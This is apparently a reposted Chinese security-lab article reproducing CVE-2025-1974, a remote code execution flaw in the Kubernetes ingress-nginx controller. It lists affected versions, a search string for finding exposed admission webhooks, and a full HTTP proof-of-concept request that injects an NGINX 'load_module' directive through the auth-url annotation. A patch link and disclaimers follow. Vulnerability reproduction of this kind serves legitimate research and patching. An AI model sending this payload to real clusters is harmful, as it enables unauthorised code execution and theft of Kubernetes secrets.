网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Kubernetes ingress-nginx是云原生计算基金会(Cloud Native Computing Foundation)开源的Kubernetes 的入口控制器,使用NGINX作为反向代理和负载均衡器。
Kubernetes ingress-nginx存在安全漏洞,该漏洞源于在某些条件下,未认证的攻击者可通过访问pod网络在ingress-nginx控制器环境中执行任意代码,可能导致Secrets泄露。
1、 ingress-nginx <= 1.12.0
2、 ingress-nginx <= 1.11.4
1.访问漏洞环境(ssl:"ingress-nginx" port:8443)
2.对漏洞进行复现
POC
漏洞复现
POST / HTTP/1.1
Host: 127.0.0.1:8443
Content-Type: application/json
Content-Length: 1599
{
"kind": "AdmissionReview",
"apiVersion": "admission.k8s.io/v1",
"request": {
"uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a6",
"kind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"resource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"requestKind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"requestResource": {
"group": "networking.k8s.io",
"version": "v1",
"resource": "ingresses"
},
"name": "test-ee05c512-4ea7-418b-b4aa-9fc5a10874ee",
"namespace": "default",
"operation": "CREATE",
"userInfo": {
},
"object": {
"kind": "Ingress",
"apiVersion": "networking.k8s.io/v1",
"metadata": {
"name": "test-ee05c512-4ea7-418b-b4aa-9fc5a10874ee",
"namespace": "default",
"creationTimestamp": null,
"annotations": {
"nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;n"
}
},
"spec": {
"ingressClassName": "nginx",
"rules": [
{
"host": "ee05c512-4ea7-418b-b4aa-9fc5a10874ee",
"http": {
"paths": [
]
}
}
]
},
"status": {
"loadBalancer": {}
}
},
"oldObject": null,
"dryRun": true,
"options": {
"kind": "CreateOptions",
"apiVersion": "meta.k8s.io/v1"
}
}
}
证明漏洞存在
3.Yakit插件测试
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/kubernetes/ingress-nginx/releases/tag/controller-v1.12.1
详细了解推荐阅读下文
https://mp.weixin.qq.com/s/JjdtzRVin9zedz8bdHh9Rg
原文始发于微信公众号(弥天安全实验室):【成功复现】Ingress NGINX Controller远程代码执行漏洞(CVE-2025-1974)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论